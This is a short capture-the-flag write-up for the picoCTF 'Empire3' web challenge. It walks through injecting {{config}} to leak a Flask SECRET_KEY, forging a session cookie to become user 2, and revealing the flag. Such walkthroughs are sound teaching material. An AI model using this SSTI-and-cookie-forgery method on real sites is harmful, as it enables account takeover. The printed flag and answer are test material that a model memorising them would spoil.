Empire3
Problem
Agent 513! One of your dastardly colleagues is laughing very sinisterly! Can you access his todo list and discover his nefarious plans? https://2019shell1.picoctf.com/problem/45132/ (link) or http://2019shell1.picoctf.com:45132
Solution
Create an account and sign in
Use EditThisCookieto get flask session cookie
Create a todo of
{{config}}
and get the flaskSECRET_KEY
variable (used for encoding session cookies)Paste
SECRET_KEY
intosecret_key
variable of attached scriptPaste flask cookie into
regular_user_cookie
variable of attached scriptRun script to decode cookie and paste into
cookie_dict
variableChange
"user_id": "x"
to"user_id": "2"
Run script again and change cookie to the new cookie
Reload the page and the flag should be given
Example Output
Decoded Cookie:
{'_fresh': True, '_id': '669830bc929eb8755b468ad78734441992a8275815de8e86acaefc907af730c0f014a3c1aebb5c4f81924a9e400164894ab9f21fda058f1542b5d07c5cccc5a3', 'csrf_token': '86c56031ea9ab7555bb9e367a80f6a3bf72a1c59', 'user_id': '3'}
Encoded Cookie For User 2:
.eJwlzzFqBTEMBNC7uE4h2ZIt5TKLpJVICCSw-38VcvdvyHRTDLz5bUddeX-09_a4ntne2vF57jKnygAP7Zoui9lpip1L1iAiVO0mfbEgnykp08KyQmFZrQEBBUg2Ai3dOagEtZNpEgBOEiVzrY51GrAUMnXnE1Zw7LCNDYn7quPx85Xf2yMzeMLANDXfHHbXHHOZQE0bXqsbBuvePe-8_k_09vcCf5o-3g.XaOrlQ.dWJr-X0v22Dhdt0rswb0cvI3lMk
Flag
picoCTF{cookies_are_a_sometimes_food_8038d44f}
Last updated
Was this helpful?